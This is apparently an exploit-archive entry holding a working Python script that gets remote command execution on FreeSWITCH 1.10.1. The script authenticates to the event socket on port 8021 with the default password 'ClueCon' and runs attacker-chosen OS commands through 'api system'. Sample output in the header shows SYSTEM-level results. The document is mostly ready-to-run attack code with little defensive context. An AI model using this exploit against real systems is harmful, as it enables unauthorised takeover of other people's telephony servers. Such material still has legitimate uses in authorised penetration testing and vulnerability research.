# Exploit Title: FreeSWITCH 1.10.1 - Command Execution # Date: 2019-12-19 # Exploit Author: 1F98D # Vendor Homepage: https://freeswitch.com/ # Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi # Version: 1.10.1 # Tested on: Windows 10 (x64) # # FreeSWITCH listens on port 8021 by default and will accept and run commands sent to # it after authenticating. By default commands are not accepted from remote hosts. # # -- Example -- # root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami # Authenticated # Content-Type: api/response # Content-Length: 20 # # nt authority\system # #!/usr/bin/python3 from socket import * import sys if len(sys.argv) != 3: print('Missing arguments') print('Usage: freeswitch-exploit.py ') sys.exit(1) ADDRESS=sys.argv[1] CMD=sys.argv[2] PASSWORD='ClueCon' # default password for FreeSWITCH s=socket(AF_INET, SOCK_STREAM) s.connect((ADDRESS, 8021)) response = s.recv(1024) if b'auth/request' in response: s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8')) response = s.recv(1024) if b'+OK accepted' in response: print('Authenticated') s.send(bytes('api system {}\n\n'.format(CMD), 'utf8')) response = s.recv(8096).decode() print(response) else: print('Authentication failed') sys.exit(1) else: print('Not prompted for authentication, likely not vulnerable') sys.exit(1)